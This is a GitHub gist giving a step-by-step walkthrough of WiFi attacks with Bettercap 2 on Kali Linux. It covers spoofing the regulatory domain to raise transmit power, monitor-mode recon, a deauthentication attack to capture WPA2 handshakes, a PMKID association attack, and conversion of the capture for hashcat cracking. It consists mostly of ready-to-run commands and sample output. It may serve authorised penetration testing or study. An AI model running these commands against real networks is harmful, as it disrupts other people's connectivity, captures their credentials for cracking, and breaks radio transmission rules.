Skip to content

Instantly share code, notes, and snippets.

@crgr

crgr/kali-wifi.md

Last active April 12, 2024 13:26
Show Gist options
  • Save crgr/1d6e517f8229031819da1dbfde57d032 to your computer and use it in GitHub Desktop.
Save crgr/1d6e517f8229031819da1dbfde57d032 to your computer and use it in GitHub Desktop.
Download ZIP
WiFi and Bettercap 2 under Kali
Raw
kali-wifi.md

Set TX Power to 30 dBm

First, obtain the country the adapter is set to:

iw reg get

If not already set, change the regulatory domain to one of the following: BO, BZ, GY, NZ, VE

iw reg set BZ

Now set the interface transmit power:

ip link set wlan1 down
iw wlan1 set txpower fixed 3000
iw wlan1 set monitor control
ip link set wlan1 up

Test that everything works:

aireplay-ng --test wlan1

Start Bettercap 2 and specify the interface that is capable of injection and monitor mode

bettercap -iface wlan1

Inside Bettercap start wifi recon:

wifi.recon on

that should result in lots of wifi events being displayed: found APs, stations connecting and disconnecting.

By default, Bettercap saves all wifi-related data to /root/bettercap-wifi-handshakes.pcap. To save the hashes to another file:

set wifi.handshakes.file /root/cst/cst-wireless.pcap

To show the results of the wireless recon, we run wifi.show. However, in crowded areas, the output will fill a few screens so we need to filter it:

set wifi.show.filter '^cst.*'

This will restrict the SSIDs shown to only those that match the regexp.

Time to show the APs:

wifi.show

┌─────────┬───────────────────┬─────────────┬──────────────────┬─────┬─────┬─────────┬────────┬────────┬──────────┐
│ RSSI ▴  │       BSSID       │    SSID     │    Encryption    │ WPS │ Ch  │ Clients │  Sent  │ Recvd  │   Seen   │
├─────────┼───────────────────┼─────────────┼──────────────────┼─────┼─────┼─────────┼────────┼────────┼──────────┤
│ -40 dBm │ 45:72:6d:82:ef:12 │ cstwireless │ WPA2 (TKIP, PSK) │     │ 60  │ 2       │ 46 kB  │ 11 kB  │ 11:48:49 │
│ -40 dBm │ 45:72:7d:82:ef:13 │ cstwireless │ WPA2 (TKIP, PSK) │     │ 1   │ 1       │ 110 kB │ 5.9 kB │ 11:48:56 │
│ -44 dBm │ 45:72:7d:82:55:26 │ cstwireless │ WPA2 (TKIP, PSK) │     │ 6   │ 2       │ 373 kB │ 150 kB │ 11:48:58 │
│ -49 dBm │ 45:72:6d:87:1a:f1 │ cstwireless │ WPA2 (TKIP, PSK) │     │ 136 │ 1       │ 20 kB  │ 2.3 kB │ 11:48:55 │
│ -64 dBm │ 45:72:7d:87:1a:f2 │ cstwireless │ WPA2 (TKIP, PSK) │     │ 11  │         │        │        │ 11:48:44 │
│ -76 dBm │ 45:72:6d:87:55:ac │ cstwireless │ WPA2 (TKIP, PSK) │     │ 100 │ 8       │ 60 kB  │ 116 kB │ 11:48:54 │
└─────────┴───────────────────┴─────────────┴──────────────────┴─────┴─────┴─────────┴────────┴────────┴──────────┘

The wifi recon will hop on every channel that the adapter is capable on tuning to. To make it stay on a specific channel:

wifi.recon.channel 1

If there are stations connected to the AP, try a deauth attack, specifying the APs BSSID (MAC address):

wifi.deauth 45:72:6d:82:ef:12

Bettercap will tell you every time a handshake was captured. If there are no stations, try the new PMKID attack:

wifi.assoc 45:72:7d:87:1a:f2

The file resulting after running this needs to be converted to a format recognizable by hashcat:

hcxpcaptool -z bettercap-wifi-handshakes.pmkid /root/bettercap-wifi-handshakes.pcap
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment